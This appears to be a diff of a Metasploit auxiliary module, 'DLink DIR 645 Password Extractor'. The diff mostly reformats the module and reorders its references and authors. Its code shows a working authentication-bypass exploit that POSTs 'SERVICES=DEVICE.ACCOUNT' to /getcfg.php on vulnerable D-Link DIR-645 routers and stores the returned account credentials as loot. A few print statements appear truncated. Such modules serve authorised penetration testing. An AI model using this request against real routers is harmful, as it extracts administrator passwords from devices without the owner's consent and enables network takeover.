@@ -16,19 +16,21 @@ def initialize
1616 super (
1717 'Name' => 'DLink DIR 645 Password Extractor' ,
1818 'Description' => %q{
19- This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.
20- With this vulnerability you are able to extract the password for the remote management.
21- } ,
19+ This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.
20+ With this vulnerability you are able to extract the password for the remote
21+ management.
22+ } ,
2223 'References' =>
2324 [
24- [ 'URL ' , 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt ' ] ,
25+ [ 'OSVDB ' , '90733 ' ] ,
2526 [ 'BID' , '58231' ] ,
26- [ 'OSVDB' , '90733' ]
27+ [ 'URL' , 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ]
28+ ] ,
29+ 'Author' =>
30+ [
31+ 'Roberto Paleari <[email protected] >' , # Vulnerability discovery 32+ 'Michael Messner <[email protected] >' # Metasploit module 2733 ] ,
28- 'Author' => [
29- 'Michael Messner <[email protected] >' , #metasploit module 30- 'Roberto Paleari <[email protected] >' #vulnerability discovery 31- ] ,
3234 'License' => MSF_LICENSE
3335 )
3436 end
@@ -45,8 +47,9 @@ def run
4547 res = send_request_cgi ( {
4648 'uri' => '/getcfg.php' ,
4749 'method' => 'POST' ,
48- 'vars_post' => {
49- 'SERVICES' => 'DEVICE.ACCOUNT'
50+ 'vars_post' =>
51+ {
52+ 'SERVICES' => 'DEVICE.ACCOUNT'
5053 }
5154 } )
5255
@@ -58,7 +61,7 @@ def run
5861 print_good ( "#{ rhost } #{ rport } )
5962
6063 #store all details as loot -> there is some usefull stuff in the response
61- loot = store_loot ( "account_details.txt " , "text/plain" , rhost , res . body )
64+ loot = store_loot ( "dlink.dir645.config " , "text/plain" , rhost , res . body )
6265 print_good ( "#{ rhost } #{ rport } #{ loot } )
6366
6467 res . body . each_line do |line |
@@ -78,7 +81,7 @@ def run
7881 :user => @user ,
7982 :pass => pass ,
8083 :active => true
81- )
84+ )
8285 end
8386 end
8487 end
0 commit comments